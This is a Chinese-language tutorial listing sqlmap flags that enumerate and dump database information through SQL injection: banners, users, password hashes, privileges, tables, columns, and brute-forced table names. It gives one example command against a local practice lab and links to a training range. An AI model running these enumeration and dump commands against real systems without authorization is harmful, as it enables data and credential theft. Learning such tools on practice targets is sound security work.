sqlmap检索DBMS信息

sqlmap检索DBMS信息

sqlmap检索DBMS banner

获取后端数据库banner信息

参数 --banner或者-b

这个在我们进行前面内容学习时就已经使用到了很多

sqlmap检索DBMS当前数据库

获取当前数据库名

参数 --current-db

sqlmap检索DBMS当前主机名

获取主机名

参数 --hostname

sqlmap检索DBMS用户信息

sqlmap探测当前用DBA

探测当前用户是否是数据库管理员

参数 --is-dba

sqlmap枚举DBMS用户密码

Sqlmap会先列举用户，再列举用户密码Hash值。

参数 --passwords

sqlmap枚举DBMS用户

获取DBMS所有用户

参数 --users

sqlmap枚举DBMS权限

参数：--privileges

当前用户有读取包含了数据库管理系统中用户信息的系统表的权限时使用这一参数可以列举数据库管理系统中用户的权限。通过用户权限可以判断哪些用户是管理员。

若想只枚举特定用户的权限使用参数"-U"指定用户，可用"CU"来代表当前用户。

python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --privileges U root

sqlmap枚举信息

sqlmap列举数据库名

列举数据库名称

参数 --dbs

sqlmap枚举数据库表

列举数据库表名

参数:    --tables 

-D 数据库名字     指定具体数据库

sqlmap枚举数据表列

列举数据库表列名

参数 -- columns

-T 数据表名   指定具体数据表

sqlmap枚举数据值

参数 --dump

sqlmap枚举schema信息

用户可用此选项列举数据库管理系统的模式。模式列表包含所有数据库、表、列、触发器 和他们各自的类型。 同样地，可使用参数–exclude-sysdbs排除系统数据库。

参数 --schema 

sqlmap检索数据表数量

如果用户只想知道表的条目数,则可以使用此参数

参数 --count

sqlmap获取数据信息

参数 --start --stop

--start 1 --stop 3 返回当前数据库表的前三条记录

sqlmap设置条件获取信息

参数 --where

sqlmap暴力破解数据

暴力破解表名

参数 --common-tables 

这里使用的其实就是sqlmap中common-tables文件里一下保存的表名进行爆破。我们也可以自己再在里面添加更多的表名。
有些情况下用–tables不能列出数据库中表名来比如:

• 1.版本小于5.0的MySQL没有information_schema表

• 2.数据库用户权限过低无法读取表名

暴力破解列名

参数 --common-columns

sqlmap检索所有信息

返回所有的检索信息

参数 -a 或者--all 

不推荐使用，返回所有的信息太多，而且也并不一定都是我们需要的

练习靶场

下面给大家推荐一个可以用作练习的地方

https://www.mozhe.cn/bug/d1hJazFDeGRHV05DVjI3YXpHREZGUT09bW96aGUmozhe